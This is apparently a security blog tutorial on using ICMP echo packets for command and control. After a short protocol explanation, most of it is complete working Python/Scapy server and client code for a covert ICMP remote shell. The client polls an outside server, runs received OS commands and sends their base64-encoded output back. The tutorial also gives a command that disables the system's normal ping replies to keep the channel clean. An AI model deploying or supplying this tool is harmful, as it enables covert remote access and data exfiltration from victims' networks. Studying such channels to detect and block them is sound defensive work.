The Internet Control Message Protocol (ICMP) is used to communicate problems related to data transmission to other hosts on a network.
If ICMP messages are not filtered from leaving networks, they can be used by attackers as a means of Command and Control (C2) to maintain access to systems, and exfiltrate data. Some organizations do not block ICMP traffic leaving their network due to it’s utility in diagnosing network issues.
Echo & Echo Reply Packets
RFC 792 documents the ICMP protocol. There are a number of different message types, but in this example we’re just going to look at echo requests and responses. Echo requests are used by the “ping” command to determine layer 3 connectivity to a remote host.
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | Code | Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identifier | Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data ...
+-+-+-+-+-
A type code of 8 is used for echo messages, and 0 for the response. The data segment can include any data. On Windows systems, the data segment if often filled with alphabetical values, on Linux systems it includes special characters and numbers as can be seen in the screenshot below;
We can use the Scapy Python library to craft raw packets, that will allow us to send Echo requests and replies with a data segment of our choosing. Note, that generating raw packets requires root access to a host!
It’s also wise to disable ICMP responses from the operating system as to not interfere with the C2 traffic;
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
The below server code waits for ICMP traffic. If it contains base64 encoded messages, it will then reply with a instruction to the client to inform them of what OS command to execute. On the next connect to the server, the command output will be supplied. By default the client will poll the server ever 0.2 seconds, although this is configurable with the “-d” flag.
Server Code
#!/usr/bin/env python3
from scapy.all import *
from datetime import datetime
import os,argparse,threading,logging,base64
logging.getLogger("scapy").setLevel(logging.CRITICAL)
#########################################
# ICMP Shell Server #
#########################################
# echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--interface', type=str, required=True, help="Interface name to listen for connections")
args = parser.parse_args()
commandlist = []
def base64decode(sinput):
try:
sinput_decoded = base64.b64decode(sinput).decode('ascii')
except Exception:
sinput_decoded = ""
return sinput_decoded
def base64encode(sinput):
sinput_bytes = sinput.encode("ascii")
sinput_encoded = base64.b64encode(sinput_bytes)
return sinput_encoded
clientdict = {}
def icmpserver(pkt):
ip_src=pkt[IP].src
command=pkt[Raw].load
decodedcommand = base64decode(command)
if decodedcommand.startswith("exec") or decodedcommand.startswith("ready"):
# Don't show commands we're sending to the client
return
if decodedcommand.startswith("hello"):
now = datetime.now()
clientdict[ip_src] = now.strftime("%H:%M:%S %d/%m/%Y")
else:
print(decodedcommand, end='')
if commandlist:
clientcommand = base64encode(commandlist[0])
commandlist.pop(0)
else:
clientcommand = base64encode("ready")
if pkt[ICMP].type == 8 and pkt[Raw].load:
icmppacket = (IP(dst=ip_src)/ICMP(type=0, code=0)/ clientcommand)
sr(icmppacket, timeout=0, verbose=0)
def StartServer():
sniff(iface=args.interface, prn=icmpserver, filter="icmp", store="0")
def main():
t1 = threading.Thread(target=StartServer)
t1.start()
while True:
usercommand = input("\ncmd>")
if usercommand == "clients":
print("{:<8} {:<50}".format('IP Address',' Connection Time'))
for k, v in clientdict.items():
label = v
print("{:<8} {:<18} ".format(k, label))
else:
commandlist.append("exec " + usercommand)
if __name__=="__main__":
main()
Client Code
from __future__ import print_function
from scapy.all import *
import sys,os,time,logging,base64,argparse
logging.getLogger("scapy").setLevel(logging.CRITICAL)
#########################################
# ICMP Shell Client #
#########################################
#logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--server', type=str, required=True, help="specific server IP address")
parser.add_argument('-d', '--delay', type=str, required=False, help="connection delay in seconds")
args = parser.parse_args()
responselist = []
serverconnected = False
CLIENT_TIMEOUT = 2
if args.delay:
SEND_RATE = float(args.delay)
else:
SEND_RATE = 0.2
def ChunkString(string, length):
return (string[0+i:length+i] for i in range(0, len(string), length))
def Base64Encode(sinput):
sinput_bytes = sinput.encode("ascii")
sinput_encoded = base64.b64encode(sinput_bytes)
return sinput_encoded
def Base64Decode(sinput):
sinput_decoded = base64.b64decode(sinput).decode('ascii')
return sinput_decoded
def SendIcmp():
if responselist:
for response in responselist:
pkt=sr1(IP(dst=args.server)/ICMP() / response,verbose=0,timeout=CLIENT_TIMEOUT)
responselist.clear()
else:
pkt=sr1(IP(dst=args.server)/ICMP() / Base64Encode("hello"),verbose=0,timeout=CLIENT_TIMEOUT)
if pkt:
ip_src=pkt[IP].src
command=pkt[Raw].load.decode('ascii')
ClientProcessCommand(command)
def ClientProcessCommand(command):
command = Base64Decode(command)
if command.startswith("ready"):
serverconnected = True
elif command.startswith("exec"):
stream = os.popen(command[5:])
output = stream.read()
if output is not None:
output = Base64Encode(output)
responselist2 = list(ChunkString(output, 100))
for response2 in responselist2:
responselist.append(response2)
else:
responselist.append("error\n")
if responselist is not None:
logging.debug(responselist)
def main():
print("Send rate is : " + str(SEND_RATE) + " seconds. " +"Connecting to " + str(args.server) + "....")
while(True):
SendIcmp()
if serverconnected == True:
print("*** Connected ***", end='\r')
sys.stdout.flush()
time.sleep(SEND_RATE)
if __name__=="__main__":
main()